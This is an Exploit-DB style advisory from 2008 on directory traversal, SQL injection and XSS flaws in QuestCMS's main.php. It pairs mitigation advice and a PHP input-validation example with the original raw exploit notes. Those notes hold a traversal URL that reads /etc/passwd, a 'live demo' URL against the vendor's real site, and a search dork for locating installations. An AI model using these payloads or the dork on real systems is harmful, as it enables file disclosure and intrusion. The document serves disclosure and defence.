Vendor: QuestCMS
By: d3b4g
CVSS: 7.5 (HIGH)
Type: XSS/Directory Traversal/SQL Injection
CWE: 79, 89, 352
Product Name: QuestCMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Questcms Multiple Remote Vulnerabilities [XSS/Directory Traversal/sql]

Questwork Web Content Management system (QuestCMS) contains multiple vulnerabilities that allow an attacker to perform Directory Traversal, SQL Injection and XSS attacks, all through the 'main.php' script. The Directory Traversal vulnerability is in the 'theme' parameter and allows an attacker to read arbitrary files on the server. The SQL Injection vulnerability is in the 'obj' parameter and allows an attacker to execute arbitrary SQL queries. The XSS vulnerability is in the 'cx' parameter and allows an attacker to inject arbitrary web script or HTML.

Mitigation:

All user-supplied data should be validated and properly sanitized before use. Additionally, the application should be configured to run under a least-privileged user account that has only the privileges necessary to perform its functions.
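
One way to apply this mitigation to the three 'main.php' parameters named above, as an added example that is not QuestCMS code and not part of the original advisory. The theme directory layout, the `objects` table and the treatment of `obj` as a numeric id are assumptions.

```php
<?php
// Added example, not QuestCMS code. The theme directory, the "objects" table
// and the numeric meaning of "obj" are assumptions made for illustration.

/** Map ?theme= to a template file, or null if it is not an installed theme. */
function resolve_theme(string $theme, string $themeDir): ?string
{
    // Plain short names only: '/', '.', '%' and NUL bytes can never match, so
    // "../" sequences and the "%00.html" truncation suffix are both rejected.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $theme)) {
        return null;
    }
    $base = realpath($themeDir);
    $path = realpath($themeDir . '/' . $theme . '.html');
    if ($base === false || $path === false) {
        return null;
    }
    // Defence in depth: the resolved file must still sit under the theme dir.
    return strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0 ? $path : null;
}

/** Fetch the row for ?obj= through a bound parameter, never by concatenation. */
function load_object(PDO $db, string $obj): ?array
{
    if (!ctype_digit($obj)) {   // assumption: obj is a numeric id
        return null;
    }
    $stmt = $db->prepare('SELECT id, title FROM objects WHERE id = :id');
    $stmt->execute([':id' => (int) $obj]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

/** HTML-encode ?cx= before it is written into the page. */
function render_cx(string $cx): string
{
    return htmlspecialchars($cx, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed demo data: a temp theme directory and an in-memory SQLite table.
$dir = sys_get_temp_dir() . '/qcms_demo_themes';
is_dir($dir) || mkdir($dir);
file_put_contents("$dir/default.html", '<html></html>');
$db = new PDO('sqlite::memory:');
$db->exec("CREATE TABLE objects (id INTEGER PRIMARY KEY, title TEXT)");
$db->exec("INSERT INTO objects VALUES (1, 'Home')");
var_dump(resolve_theme('default', $dir));
var_dump(resolve_theme("../../etc/passwd\0.html", $dir));
var_dump(load_object($db, '1'), load_object($db, "1' OR '1'='1"));
echo render_cx('<script>alert(1)</script>'), PHP_EOL;
```

The database account used by `load_object` should hold only SELECT on the tables the page needs, in line with the least-privilege advice above.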

Exploit-DB raw data:

--------------------------------------------------------------------------------

Title : Questcms Multiple Remote Vulnerabilities [XSS/Directory Traversal/sql]

--------------------------------------------------------------------------------
#Author: d3b4g


#contact: bl4ckend[at]gmail[dot]com

--------------------------------------------------------------------------------
Affected software:
--------------------------------------------------------------------------------
Application :  Questwork Web Content Management system (QuestCMS)
URL :  http://www.questwork.com

--------------------------------------------------------------------------------

dork        : allinurl:"/questcms/"
--------------------------------------------------------------------------------
Directory traversal vulnerability
=============================
Exploit     : questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html

Live demo   : http://www.questwork.com/questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html


---------------------------------------------------------------------------------

sql injection:
==============
Vuln file:questcms/main/main.php?obj=[sql]


XSS:
====
exploit:/main/main.php?cx=[Xss]
--------------------------------------------------------------------------------



--------------------------------------------------------------------------------

greetz:

All my friends,milw0rm...

--------------------------------------------------------------------------------



--------------------------------- [ www.hotlism.org ] --------------------------------------

# milw0rm.com [2008-10-27]